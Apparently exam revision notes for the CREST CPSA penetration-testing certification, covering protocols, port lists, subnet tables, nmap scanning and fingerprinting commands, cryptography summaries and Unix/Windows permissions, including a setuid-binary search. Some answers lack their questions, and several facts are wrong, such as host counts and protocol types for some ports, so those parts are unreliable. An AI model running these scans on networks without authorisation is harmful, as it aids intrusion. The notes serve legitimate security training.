Cpsa Crest Revision 1) Core Technical Skills: IGRP - Interior Gateway Routing Protocol

CPSA CREST REVISION
1) Core Technical Skills
B1) IP Protocols
IP Protocols
Internet Protocol (IP)
Transmission Control Protocol (TCP)
User Datagram Protocol (UDP)
Internet Control Message Protocol (ICMP)
Routing Protocols:
RIP - Routing Information Protocol
OSPF - Open Shortest Path First
BGP - Border Gateway Protocol
IGRP - Interior Gateway Routing Protocol
https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers
Protocol
Hex Keyword Protocol References/RFC
Number
0x00 0 HOPOPT IPv6 Hop-by-Hop Option RFC 8200
0x01 1 ICMP Internet Control Message Protocol RFC 792
0x02 2 IGMP Internet Group Management Protocol RFC 1112
0x03 3 GGP Gateway-to-Gateway Protocol RFC 823
0x06 6 TCP Transmission Control Protocol RFC 793

0x08 8 EGP Exterior Gateway Protocol RFC 888
Interior Gateway Protocol (any
0x09 9 IGP private interior gateway (used by
Cisco for their IGRP))
0x11 17 UDP User Datagram Protocol RFC 768
0x29 41 IPv6 IPv6 Encapsulation RFC 2473
0x2B 43 IPv6-Route Routing Header for IPv6 RFC 8200
0x2C 44 IPv6-Frag Fragment Header for IPv6 RFC 8200
0x32 50 ESP Encapsulating Security Payload RFC 4303
0x33 51 AH Authentication Header RFC 4302
0x3A 58 IPv6-ICMP ICMP for IPv6 RFC 4443, RFC 4884
0x3B 59 IPv6-NoNxt No Next Header for IPv6 RFC 8200
0x3C 60 IPv6-Opts Destination Options for IPv6 RFC 8200
MAC Address:
A media access control address (MAC address) of a computer is a unique identifier assigned to network
interfaces for communications at the data link layer of a network segment.
MAC has a 48-bit address space.
Classful network:
What is the subnet mask for /23 network?

255.255.254.0
What port to open for VPN services? (AH,ESP)

a) PPTP tunnel based VPN uses TCP Port number 1723 and IP Protocol number 47 (GRE). Please note: The 47
is IP protocol number of GRE and not a port number inside TCP or UDP header.
b) L2TP tunnel based VPN uses IPSec: UDP Port 500 (IKE) and 4500 (NAT-T), and IP protocol 50 number (ESP)
. Note: Same comment as above – it is IP protocol 50 and not port number inside TCP or UDP.
c) SSTP tunnel uses TCP port 443 (SSL)
What is the default port of DB2?

TCP 50000
What is running on port 3128?

Squid Proxy
What is running on Port 1524?

Ingress
How many TCP ports in total?

65535 ports

PPTP
Class Address # of Hosts Netmask (Binary) Netmask (Decimal)
CIDR /4 240,435,456 11110000 00000000 00000000 00000000 240.0.0.0
CIDR /5 134,217,728 11111000 00000000 00000000 00000000 248.0.0.0
CIDR /6 67,108,864 11111100 00000000 00000000 00000000 252.0.0.0
CIDR /7 33,554,432 11111110 00000000 00000000 00000000 254.0.0.0
A /8 16,777,216 11111111 00000000 00000000 00000000 255.0.0.0
CIDR /9 8,388,608 11111111 10000000 00000000 00000000 255.128.0.0
CIDR /10 4,194,304 11111111 11000000 00000000 00000000 255.192.0.0
CIDR /11 2,097,152 11111111 11100000 00000000 00000000 255.224.0.0
CIDR /12 1,048,576 11111111 11110000 00000000 00000000 255.240.0.0
CIDR /13 524,288 11111111 11111000 00000000 00000000 255.248.0.0
CIDR /14 262,144 11111111 11111100 00000000 00000000 255.252.0.0
CIDR /15 131,072 11111111 11111110 00000000 00000000 255.254.0.0
B /16 65,534 11111111 11111111 00000000 00000000 255.255.0.0
CIDR /17 32,768 11111111 11111111 10000000 00000000 255.255.128.0
CIDR /18 16,384 11111111 11111111 11000000 00000000 255.255.192.0
CIDR /19 8,192 11111111 11111111 11100000 00000000 255.255.224.0
CIDR /20 4,096 11111111 11111111 11110000 00000000 255.255.240.0
CIDR /21 2,048 11111111 11111111 11111000 00000000 255.255.248.0

CIDR /22 1,024 11111111 11111111 11111100 00000000 255.255.252.0
CIDR /23 512 11111111 11111111 11111110 00000000 255.255.254.0
C /24 256 11111111 11111111 11111111 00000000 255.255.255.0
CIDR /25 128 11111111 11111111 11111111 10000000 255.255.255.128
CIDR /26 64 11111111 11111111 11111111 11000000 255.255.255.192
CIDR /27 32 11111111 11111111 11111111 11100000 255.255.255.224
CIDR /28 16 11111111 11111111 11111111 11110000 255.255.255.240
CIDR /29 8 11111111 11111111 11111111 11111000 255.255.255.248
CIDR /30 4 11111111 11111111 11111111 11111100 255.255.255.252
List of Ports:
http://packetlife.net/media/library/23/common-ports.pdf
19 UDP CHARGEN
21 TCP FTP (File Transfer Protocol)
22 TCP/UDP SSH (ssh,scp copy or sftp)
23 TCP/UDP Telnet
25 TCP/UDP SMTP (for sending outgoing emails)
43 TCP WHOIS function
53 TCP/UDP DNS Server (Domain name service for DNS requests)
67 UDP DHCP Server

68 TCP DHCP Client
70 TCP Gopher Protocol
79 TCP Finger protocol

123 TCP NTP (Network Time Protocol)
110 TCP POP3 (for receiving email)
119 TCP NNTP (Network News Transfer Protocol)
143 TCP/UDP IMAP4 Protocol (for email service)
194 TCP IRC
389 TCP/UDP LDAP (light weight directory access)
636 TCP/UDP LDAP over SSL
443 TCP Secure HTTP over SSL (https)
465 TCP Secure SMTP (email) using SSL
500 UDP IKE
512 TCP r-exec
513 TCP r-login
514 TCP r-services
520 UDP RIP
990 TCP/UDP Secure FTP using SSL
993 TCP Secure IMAP protocol over SSL (for emails)
1433 TCP/UDP Microsoft SQL server port
2082 TCP Cpanel default port
2083 TCP Cpanel over SSL
2086 TCP Cpanel Webhost Manager (default)
2087 TCP Cpanel Webhost Manager (with https)
2095 TCP Cpanel Webmail
2096 TCP Cpanel secure webmail over SSL

2222 TCP DirectAdmin Server Control Panel
3306 TCP/UDP MySQL Database Server
4643 TCP Virtuosso Power Panel
5432 TCP PostgreSQL Database Server
6000 TCP X11 (X-Server in Unix)
8080 TCP HTTP port (alternative one for port 80)
8087 TCP Plesk Control Panel Port (default)
8443 TCP Plesk Server Control Panel over SSL
9999 TCP Urchin Web Analytics
10000 TCP Webmin Server Control Panel
19638 TCP Ensim Server Control Panel
What is on Port 123?

Network Time Protocol, NTP. TCP as UDP

POP3, getting mails. TCP as UDP
What is on Port 19?

Character Generator, TCP as UDP
What is on Port 7?
Echo

Postgresql
What is on Port 23?

Telnet

Routing Information Protocol, UDP

R-exec

R-Login
R-Shell
What is on Port 79?

Finger
What is on Port MSSQL and hidden mode?

TCP port 1433 and Hidden 2433
What is the default port of Oracle database?

1521, TCP
What port is used for ipsec?

500 (Internet Key Exchange)
What does IKE stands for?

Internet Key Exchange
In computing, Internet Key Exchange (IKE, sometimes IKEv1 or IKEv2, depending on version) is the protocol
used to set up a security association (SA) in the IPsec protocol suite. IKE builds upon the Oakley protocol and
ISAKMP.[1] IKE uses X.509 certificates for authentication - either pre-shared or distributed using DNS
(preferably with DNSSEC) and a Diffie–Hellman key exchange - to set up a shared session secret from
which cryptographic keys are derived.[2][3] In addition, a security policy for every peer which will connect
must be manually maintained.[2]
What does LSASS stands for?

Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that
is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows
computer or server, handles password changes, and creates access tokens.[1] It also writes to the Windows
Security Log.
What does SAM stands for?

The Security Account Manager (SAM) is a database file[1] in Windows XP, Windows Vista and Windows 7 that
stores users' passwords. It can be used to authenticate local and remote users. Beginning with Windows 2000
SP4, Active Directory authenticates remote users. SAM uses cryptographic measures to prevent forbidden
users to gain access to the system.
What does EAP stands for?

Extensible Authentication Protocol, or EAP, is an authentication framework frequently used in wireless
networks and point-to-point connections.
EAP is an authentication framework, not a specific authentication mechanism.[1] It provides some common
functions and negotiation of authentication methods called EAP methods. There are currently about 40
different methods defined.
What does WPA stands for?

Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security
certification programs developed by theWi-Fi Alliance to secure wireless computer networks. The Alliance
defined these in response to serious weaknesses researchers had found in the previous system, Wired
Equivalent Privacy (WEP).[1]
What does SMS,SUS,WSUS, MBSA stands for?

Windows Update Agent (WUA)
Systems Management Server (SMS)
Server update services (SUS)
Windows Server Update Services (WSUS)
Microsoft Baseline Security Analyzer (MBSA)
What does OSPF stands for?

Open Shortest Path First (OSPF) is a routing protocol for Internet Protocol (IP) networks. It uses a link state
routing (LSR) algorithm and falls into the group of interior routing protocols, operating within a single
autonomous system (AS).
What does RIP stands for?

The Routing Information Protocol (RIP) is one of the oldest distance-vector routing protocols which employ
the hop count as a routing metric. RIP prevents routing loops by implementing limit on the number of hops
allowed in a path from source to destination. The maximum number of hops allowed for RIP is 15, which limits
the size of networks that RIP can support. A hop count of 16 is considered an infinite distance and the route is
considered unreachable. RIP implements the split horizon, route poisoning and holddown mechanisms to
prevent incorrect routing information from being propagated.
What does tkip stands for?

Temporal Key Integrity Protocol or TKIP /tikp/ was a stopgap security protocol used in the IEEE 802.11
wireless networking standard. TKIP was designed by the IEEE 802.11i task group and the Wi-Fi Alliance as an
interim solution to replace WEP without requiring the replacement of legacy hardware.
What does STP stands for?

The Spanning Tree Protocol (STP) is a network protocol that builds a logical loop-free topology for Ethernet
networks. The basic function of STP is to prevent bridge loops and the broadcast radiation that results from
them.
What does PGP stand for?

Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for
data communication. PGP is often used for signing, encrypting, and decrypting texts, e-mails, files, directories,
and whole disk partitions and to increase the security of e-mail communications.
What does DES stands for ?

The Data Encryption Standard (DES, /diis/ or /dz/) is a symmetric-key algorithm for the encryption of electronic
data.
Successor is 3DES
What is the use of EICAR ?

Being a selfstanding term now, it stood originally for European Institute for Computer Antivirus Research.
However, we are now busy in the general IT Security field with a focus on AV and hence we do not refer to the
full term anymore.
EICAR is a text file with a signature recognised by all AV vendors to test if a virus is detected by the AV engine.
EICAR is not a virus by itself.
How does traceroute work?

In Linux, traceroute by default sends a sequence of User Datagram Protocol (UDP) packets addressed to a
destination host; ICMP Echo Request or TCP SYN packets can also be used.[1] In Windows, traceroute sends
ICMP echo requests instead of UDP packets.[2] The time-to-live (TTL) value, also known as hop limit, is used in
determining the intermediate routers being traversed towards the destination. Routers decrement TTL values
of packets by one when routing and discard packets whose TTL value has reached zero, returning the ICMP
error message ICMP Time Exceeded.[3] Common default values for the initial TTL are 128 (Windows OS) and
64 (Unix-based OS).
Traceroute works by sending packets with gradually increasing TTL value, starting with TTL value of one. The
first router receives the packet, decrements the TTL value and drops the packet because it then has TTL value
zero. The router sends an ICMP Time Exceeded message back to the source. The next set of packets are given a
TTL value of two, so the first router forwards the packets, but the second router drops them and replies with
ICMP Time Exceeded. Proceeding in this way, traceroute uses the returned ICMP Time Exceeded messages to
build a list of routers that packets traverse, until the destination is reached and returns an ICMP Echo Reply
message.[3]
What does AJAX stands for?

Ajax (also AJAX; /edæks/; short for asynchronous JavaScript and XML)[1][2][3] is a set of web development
techniques using many web technologies on the client-side to create asynchronous Web applications.
What does SOAP stands for?

SOAP (Simple Object Access Protocol) is a protocol specification for exchanging structured information in the
implementation of web services in computer networks.
What does IIS stands for?

Internet Information Services (IIS, formerly Internet Information Server) is an extensible web server created by
Microsoft for use with Windows NT family.[2] IIS supports HTTP, HTTPS, FTP, FTPS, SMTP and NNTP. It has
been an integral part of the Windows NT family since Windows NT 4.0, though it may be absent from some
editions (e.g. Windows XP Home edition), and is not active by default.
What does URI stands for?

In information technology, a Uniform Resource Identifier (URI) is a string of characters used to identify a
resource. Such identification enables interaction with representations of the resource over a network, typically
the World Wide Web, using specific protocols. Schemes specifying a concrete syntax and associated protocols
define each URI. The most common form of URI is the Uniform Resource Locator (URL), frequently referred to
informally as a web address.
What does HTTP stands for?

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia
information systems.[1] HTTP is the foundation of data communication for the World Wide Web.
What does FSMO stands for ?

Flexible Single Master Operations (FSMO, F is sometimes floating ; pronounced Fiz-mo), or just single master
operation or operations master, is a feature of Microsoft's Active Directory (AD).[1] As of 2005, the term FSMO
has been deprecated in favour of operations masters.
What does NETBIOS stands for?

NetBIOS /ntb.s/ is an acronym for Network Basic Input/Output System. It provides services related to the
session layer of the OSI model allowing applications on separate computers to communicate over a local area
network. As strictly an API, NetBIOS is not a networking protocol.
B2) Network Architectures
WEP (Wired Equivalent Privacy)

64bit WEP Key (40 + 24 (IV) (Initialization Vector)
128bit WEP Key (104 + 24 (IV) (Initialization Vector)
B4) Network Mapping & Target Identification
Map route between engagement point and target:

• traceroute (uses UDP or ICMP echo)
• tcptraceroute (use TCP SYN)
• tracert (Windows)
Network sweeping (Ping Sweep)
• ICMP sweeps (ICMP ECHO request) is a basic network scanning technique used to determine which of
a range of IP addresses map to live hosts (computers). Whereas a single ping will tell you whether one
specified host computer exists on the network, a ping sweep consists of ICMP (Internet Control
Message Protocol) ECHO requests sent to multiple hosts. If a given address is live, it will return an
ICMP ECHO reply. Ping sweeps are among the older and slower methods used to scan a network.
o nmap -sn 192.168.1.1 (no port scan, only check if hosts are up)
▪ The default host discovery done with -sn consists of an ICMP echo request, TCP SYN
to port 443, TCP ACK to port 80, and an ICMP timestamp request by default.
o fping 192.168.1.1
▪ http://itswapshop.com/tutorial/fping-tutorial-how-use-fping-examples
• Sending ICMP ECHO request to the network or/and broadcast addresses will produce all
the information you need for mapping a targeted network.
o Some systems will not reply to ICMP ECHO requests via broadcast, therefore not very
reliable
Network sweeping (TCP)
With the TCP Sweep technique, instead of sending ICMP ECHO request packets we send TCP ACK or TCK SYN
packets (depending if we have root access or not) to the target network. The port number can be selected to
meet our needs. Usually a good pick would be one of the following ports – 21 / 22 / 23 / 25 / 80 (especially if a
firewall is protecting the targeted network). Receiving a response is a good indication that something is up
there. The response depends on the target’s operating system, the nature of the packet sent and any firewalls,
routers or packet-filtering devices used. Bear in mind that firewalls can spoof a RESET packet for an IP address,
so TCP Sweeps may not be reliable.
• nmap -sn 192.168.1.1 (no port scan, only check if hosts are up)
o The default host discovery done with -sn consists of an ICMP echo request, TCP SYN to port
443, TCP ACK to port 80, and an ICMP timestamp request by default.
B5) Interpreting Tool Output
Port scanner:
• Port ranges:
o The port numbers in the range from 0 to 1023 are the well-known ports or system ports.
They are used by system processes that provide widely used types of network services. On
Unix-like operating systems, a process must execute with superuser privileges to be able to
bind a network socket to an IP address using one of the well-known ports.
o The range of port numbers from 1024 to 49151 are the registered ports. They are assigned
by IANA for specific service upon application by a requesting entity. On most systems,
registered ports can be used by ordinary users.
o The range 49152–65535 (215+214 to 216−1) contains dynamic or private ports that cannot
be registered with IANA. This range is used for private, or customized services or temporary
purposes and for automatic allocation of ephemeral ports.
• Types of Scanning Method
o -sS (TCP SYN scan)
o -sT (TCP connect scan)
o -sU (UDP scans)
o -sY (SCTP INIT scan)
o -sN; -sF; -sX (TCP NULL, FIN, and Xmas scans)
o -sA (TCP ACK scan)
• tcpdump
o Interpreting tcpdump output, http://packetpushers.net/masterclass-tcpdump-interpreting-
output/
Generic TCP. Here’s a line of output related to an SSH session. Note the -v parameter has been used, without
it, the IP header information and
Generic UDP. Response with -v, as you can see, without it the IP header information and the UDP information
is not displayed;
TTL List
B6) Filtering Avoidance Techniques
Ingress:
Network traffic that originates from outside of the network's routers and proceeds toward a destination inside
of the network.
What is running on Port 1524?

Ingress
Egress:
Network traffic that begins inside of a network and proceeds through its routers to a destination somewhere
outside of the network.
As a security-in-depth measure not only ingress should be restricted but also egress traffic. This would make it
harder for an attacker to start a reverse shell on the server, if only the services running on the server are
allowed to connect to the outside world.
B8) OS Fingerprinting
Active fingerprinting:
Active fingerprinting is the process of transmitting packets to a remote host and analysing corresponding
replies.
Passive fingerprinting:
Passive fingerprinting is the process of analysing packets from a host on a network. In this case, fingerprinter
acts as a sniffer and doesn't put any traffic on a network.
Active fingerprinting by using nmap:

• OS defection (-O) and versions scan (-sV)
- Nmap -O -sV -v <IP>
• Use IPv6 (-6)
- Nmap -6 -O -sV -v <IP>
Passive fingerprinters by NetworkMiner, Satori and p0f
B9) Application Fingerprinting and Evaluating Unknown Services

• nmap -sV -sC -T4 -F <IP>
-sV is for version scanning
-sC is to scan using some default nmap script
Recall that -T4 causes Nmap to go faster (more aggressive timing) and -F tells Nmap to scan only ports
registered in nmap-services.
B10) Network Access Control Analysis
B11) Cryptography
Which of the following is a Symmetric encryption? MD2, MD5, AES

MD2, MD5 and SHA1 are hashing algorithms.
AES (Advanced Encryption Standard) is symmetric encryption algorithm.
Differences between encryption and encoding.

If data is encrypted it can be decrypted again into the original, clear text but only by the person that is in
possession of the secret/key.
Encoding is the process of applying a specific code, such as letters, symbols and numbers, to data for
conversion into an equivalent cipher. Only the encoding needs to be known (such as Base64) to decode the
data back into the clear text.
Symmetric / asymmetric encryption

Symmetric-key algorithms are algorithms for cryptography that use the same cryptographic keys for both
encryption of plaintext and decryption of ciphertext. The keys may be identical or there may be a simple
transformation to go between the two keys.
Asymmetric Encryption is a form of Encryption where keys come in pairs. What one key encrypts, only the
other can decrypt. Frequently (but not necessarily), the keys are interchangeable, in the sense that if key A
encrypts a message, then B can decrypt it, and if key B encrypts a message, then key A can decrypt it.
Data Encryption Standard (DES)

The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of electronic data.
Although now considered insecure, it was highly influential in the advancement of modern cryptography.
Key sizes 56 bits (+8 parity bits)
Block sizes 64 bits
Structure Balanced Feistel network

Rounds 16
Triple Data Encryption Standard (3DES, or officially the Triple Data Encryption Algorithm TDEA or Triple DEA)
The original DES cipher's key size of 56 bits was generally sufficient when that algorithm was designed, but the
availability of increasing computational power made brute-force attacks feasible. Triple DES provides a
relatively simple method of increasing the key size of DES to protect against such attacks, without the need to
design a completely new block cipher algorithm.
Key sizes 168, 112 or 56 bits (keying option1, 2, 3 respectively)
Block sizes 64 bits
Structure Feistel network
Rounds 48 DES-equivalent rounds
Advanced Encryption Standard (AES)

AES, also known as Rijndael[4][5] (its original name), is a specification for the encryption of electronic data
established by the U.S. National Institute of Standards and Technology (NIST) in 2001.[6]
Key sizes 128, 192 or 256 bits[1]
Block sizes 128 bits[2]
Structure Substitution-permutation network
Rounds 10, 12 or 14 (depending on key size)

AES has 10 rounds for 128-bit keys, 12 rounds for 192-bit keys, and 14 rounds for 256-bit keys.
RSA (Rivest, Shamir, Adleman)

RSA is one of the first practical public-key cryptosystems and is widely used for secure data transmission. In
such a cryptosystem, the encryption key is public and differs from the decryption key which is kept secret. In
RSA, this asymmetry is based on the practical difficulty of factoring the product of two large prime numbers,
the factoring problem.
RSA is a relatively slow algorithm, and because of this it is less commonly used to directly encrypt user data.
More often, RSA passes encrypted shared keys for symmetric key cryptography which in turn can perform bulk
encryption-decryption operations at much higher speed.
Key sizes 1,024 to 4,096 bit typical
Rounds 1
RC4
In cryptography, RC4 (Rivest Cipher 4 also known as ARC4 or ARCFOUR meaning Alleged RC4, see below) is a
stream cipher. While remarkable for its simplicity and speed in software, multiple vulnerabilities have been
discovered in RC4, rendering it insecure.[3][4] It is especially vulnerable when the beginning of the output
keystream is not discarded, or when nonrandom or related keys are used. Particularly problematic uses of RC4
have led to very insecure protocols such as WEP.[5]
Key sizes 40–2048 bits
State size 2064 bits (1684 effective)

Rounds 1
MD5
The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was initially
designed to be used as a cryptographic hash function, it has been found to suffer from extensive
vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional
corruption.
Like most hash functions, MD5 is neither encryption nor encoding. It can be reversed by brute-force attack and
suffers from
extensive vulnerabilities.
Digest sizes 128 bit
Block sizes 512 bit
SHA-1 (Secure Hash Algorithm 1)

In cryptography, SHA-1 (Secure Hash Algorithm 1) is a cryptographic hash function designed by the United
States National Security Agency and is a U.S. Federal Information Processing Standard published by the United
States NIST.[2] SHA-1 produces a 160-bit (20-byte) hash value known as a message digest. A SHA-1 hash value
is typically rendered as a hexadecimal number, 40 digits long.
Digest sizes 160 bits
Block sizes 512 bits
Structure Merkle–Damgård construction
Rounds 80
Hash-based message authentication code (HMAC)

In cryptography, a keyed-hash message authentication code (HMAC) is a specific type of message
authentication code (MAC) involving a cryptographic hash function (hence the 'H') in combination with a secret
cryptographic key. As with any MAC, it may be used to simultaneously verify both the data integrity and the
authentication of a message. Any cryptographic hash function, such as MD5 or SHA-1, may be used in the
calculation of an HMAC; the resulting MAC algorithm is termed HMAC-MD5 or HMAC-SHA1 accordingly. The
cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function,
the size of its hash output, and on the size and quality of the key.
B12 Applications of Cryptography
Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), both frequently referred to as
"SSL", are cryptographic protocols that provide communications security over a computer network.
When secured by TLS, connections between a client (e.g., a web browser) and a server (e.g., wikipedia.org)
have one or more of the following properties:
• The connection is private (or secure) because symmetric cryptography is used to encrypt the data
transmitted. The keys for this symmetric encryption are generated uniquely for each connection and are
based on a shared secret negotiated at the start of the session (see TLS handshake protocol). The server
and client negotiate the details of which encryption algorithm and cryptographic keys to use before the
first byte of data is transmitted (see Algorithm below). The negotiation of a shared secret is both secure
(the negotiated secret is unavailable to eavesdroppers and cannot be obtained, even by an attacker who
places themselves in the middle of the connection) and reliable (no attacker can modify the
communications during the negotiation without being detected).
• The identity of the communicating parties can be authenticated using public-key cryptography. This
authentication can be made optional, but is generally required for at least one of the parties (typically the
server).
• The connection ensures integrity because each message transmitted includes a message integrity check
using a message authentication code to prevent undetected loss or alteration of the data during
transmission.[1]:3
IPSec
Internet Protocol Security (IPsec) is a protocol suite for secure Internet Protocol (IP) communications that
works by authenticating and encrypting each IP packet of a communication session. IPsec includes protocols
for establishing mutual authentication between agents at the beginning of the session and negotiation of
cryptographic keys to be used during the session. IPsec can be used in protecting data flows between a pair of
hosts (host-to-host), between a pair of security gateways (network-to-network), or between a security
gateway and a host (network-to-host).[1] Internet Protocol security (IPsec) uses cryptographic security services
to protect communications over Internet Protocol (IP) networks. IPsec supports network-level peer
authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay
protection.
IPsec is an end-to-end security scheme operating in the Internet Layer of the Internet Protocol Suite, while
some other Internet security systems in widespread use, such as Transport Layer Security (TLS) and Secure
Shell (SSH), operate in the upper layers at the Transport Layer (TLS) and the Application layer (SSH). Hence,
only IPsec protects all application traffic over an IP network. Applications can be automatically secured by
IPsec at the IP layer.
Authentication Header (AH) is a member of the IPsec protocol suite. AH guarantees

connectionless integrity and data origin authentication of IP packets. Further, it can optionally protect
against replay attacks by using the sliding window technique and discarding old packets
Encapsulating Security Payload (ESP) is a member of the IPsec protocol suite. In IPsec it provides
origin authenticity, integrity and confidentiality protection of packets. ESP also supports encryption-only
and authentication-only configurations, but using encryption without authentication is strongly discouraged
because it is insecure.
Secure Shell (SSH)

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an
unsecured network.[1] The best known example application is for remote login to computer systems by users.
SSH provides a secure channel over an unsecured network in a client-server architecture, connecting an SSH
client application with an SSH server.[2] Common applications include remote command-line login and remote
command execution, but any network service can be secured with SSH. The protocol specification
distinguishes between two major versions, referred to as SSH-1 and SSH-2.
SSH was designed as a replacement for Telnet and for unsecured remote shell protocols such as the Berkeley
rlogin, rsh, and rexec protocols. Those protocols send information, notably passwords, in plaintext, rendering
them susceptible to interception and disclosure using packet analysis.
Pretty Good Privacy (PGP)

Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for
data communication. PGP is often used for signing, encrypting, and decrypting texts, e-mails, files, directories,
and whole disk partitions and to increase the security of e-mail communications. It was created by Phil
Zimmermann in 1991.[2]
PGP and similar software follow the OpenPGP standard (RFC 4880) for encrypting and decrypting data.
WEP
Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of
the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to
that of a traditional wired network.[1] WEP, recognizable by the key of 10 or 26 hexadecimal digits, was at one
time widely in use and was often the first security choice presented to users by router configuration tools.
In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA). In
2004, with the ratification of the full 802.11i standard (i.e. WPA2), the IEEE declared that both WEP-40 and
WEP-104 have been deprecated.
WEP was included as the privacy component of the original IEEE 802.11 standard ratified in 1997.[5][6] WEP
uses the stream cipher RC4 for confidentiality,[7] and the CRC-32 checksum for integrity.[8]
Standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit
initialization vector (IV) to form the RC4 key. At the time that the original WEP standard was drafted, the U.S.
Government's export restrictions on cryptographic technology limited the key size. Once the restrictions were
lifted, manufacturers of access points implemented an extended 128-bit WEP protocol using a 104-bit key size
(WEP-104).
WPA
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security
certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance
defined these in response to serious weaknesses researchers had found in the previous system, Wired
Equivalent Privacy (WEP).
A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup, allows WPA and WPA2 security to be
bypassed and effectively broken in many situations.[2] WPA and WPA2 security implemented without using
the Wi-Fi Protected Setup feature are unaffected by the security vulnerability.
• WPA-Personal. Also referred to as WPA-PSK (pre-shared key) mode, this is designed for home and
small office networks and doesn't require an authentication server.[9] Each wireless network device
encrypts the network traffic using a 256 bit key. This key may be entered either as a string of 64
hexadecimal digits, or as a passphrase of 8 to 63 printable ASCII characters.[10] If ASCII characters are
used, the 256 bit key is calculated by applying the PBKDF2 key derivation function to the passphrase,
using the SSID as the salt and 4096 iterations of HMAC-SHA1.[11] WPA-Personal mode is available
with both WPA and WPA2.
• WPA-Enterprise. Also referred to as WPA-802.1X mode, and sometimes just WPA (as opposed to
WPA-PSK), this is designed for enterprise networks and requires a RADIUS authentication server. This
requires a more complicated setup, but provides additional security (e.g. protection against dictionary
attacks on short passwords). Various kinds of the Extensible Authentication Protocol (EAP) are used
for authentication. WPA-Enterprise mode is available with both WPA and WPA2.
• Wi-Fi Protected Setup (WPS). This is an alternative authentication key distribution method intended
to simplify and strengthen the process, but which, as widely implemented, creates a major security
hole via WPS PIN recovery.
TKIP (Temporal Key Integrity Protocol)

TKIP is an encryption protocol. The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it
dynamically generates a new key for each packet. Used by WPA.
B13 File System Permissions
Unix
• https://www.ics.uci.edu/computing/linux/file-security.php
• https://en.wikipedia.org/wiki/File_system_permissions#Notation_of_traditional_Unix_permissions
o chmod is used to change file permissions

o ls -l can be used to show file permissions
o Show file permissions in octal
▪ Linux: # stat -c "%a %n" *
2755 test.txt
▪ Mac OS X: # stat -f '%A %a %N' test.txt
2755 test.txt
Set-user Identification (SUID): When a command or script with SUID bit set is run, its effective UID becomes
that of the owner of the file, rather than of the user who is running it (non-root user executes script with UID
root is executed as root).The SUID permission symbol is s for the owner.
• chmod 4755 test.txt

• ls -alh test.txt
-rwsr-sr-x 1 sven staff 8B Aug 3 19:12 test.txt
• Find setuid binaries
• find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt &
• Find setuid or setgid binaries
• find / -perm /6000; > setuid_or_setgid.txt &
Set-group identification (SGID): When a file with SGID is executed, the resulting process will assume the group
ID given to the group class. When SGID permission is set on a directory, files created in the directory belong to
the group of which the directory is a member. The GUID permission symbol is s for the group.
• chmod 2755 test.txt

• ls -alh test.txt
-rwxr-sr-x 1 sven staff 8B Aug 3 19:12 test.txt
sticky bit: Sticky Bit is used for directories to protect files within them. Files in a directory with the sticky bit set
can only be deleted or renamed by the root user or the owner of the directory. The sticky bit permission
symbol is t.
• chmod +t testDir OR chmod 1755 testDir

• ls -alh testDir
total 0
drwxr-xr-t 2 sven staff 68B Aug 3 19:15 .
drwx------+ 103 sven staff 3.4K Aug 3 19:15 ..
Windows
http://www.online-tech-tips.com/computer-tips/set-file-folder-permissions-windows/
http://stackoverflow.com/questions/2928738/how-to-grant-permission-to-users-for-a-directory-using-
command-line-in-windows
https://technet.microsoft.com/en-us/library/cc753525(WS.10).aspx
• icacls
Examples:
• icacls c:\windows\* /save AclFile /T
- Will save the ACLs for all files under c:\windows and its subdirectories to AclFile.
• icacls c:\windows\ /restore AclFile

- Will restore the ACLs for every file within AclFile that exists in c:\windows and its subdirectories.
• icacls file /grant Administrator:(D,WDAC)

- Will grant the user Administrator Delete and Write DAC permissions to file.
• icacls file /grant *S-1-1-0:(D,WDAC)

- Will grant the user defined by sid S-1-1-0 Delete and Write DAC permissions to file.
• Show ACL of a directory

PS C:\Users\Sven\Desktop> icacls.exe .
. NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
WIN8\Sven:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
• Show ACL of a single file. All three users have full access (F)
PS C:\Users\Sven\Desktop> icacls.exe .\README.txt
.\README.txt NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN8\Sven:(F)
Successfully processed 1 files; Failed processing 0 files
A sequence of simple rights:

F (full access)
M (modify access)
RX (read and execute access)
R (read-only access)
W (write-only access)
Specific rights:
D (delete)
RC (read control)
WDAC (write DAC), Microsoft Dynamic Access Control (DAC) is a data governance tool in Windows Server 2012
that lets administrators control access settings.
WO (write owner)
S (synchronize)
AS (access system security)
MA (maximum allowed)
GR (generic read)
GW (generic write)
GE (generic execute)
GA (generic all)
RD (read data/list directory)
WD (write data/add file)
AD (append data/add subdirectory)
REA (read extended attributes)
WEA (write extended attributes)
X (execute/traverse)
DC (delete child)
RA (read attributes)
WA (write attributes)
Inheritance rights may precede either Perm form, and they are applied only to directories:
(OI): object inherit
(CI): container inherit
(IO): inherit only
(NP): do not propagate inherit
Registry:
List ACL information of Files and Registry

Keys: http://www.windowsnetworking.com/kbase/WindowsTips/Windows8/AdminTips/easy-way-list-acl-
information-file-or-registry-keys.html
o Read ACL of Registry Key:
• Access to Registry (query, edit etc.) with other tools:

o regedit.exe
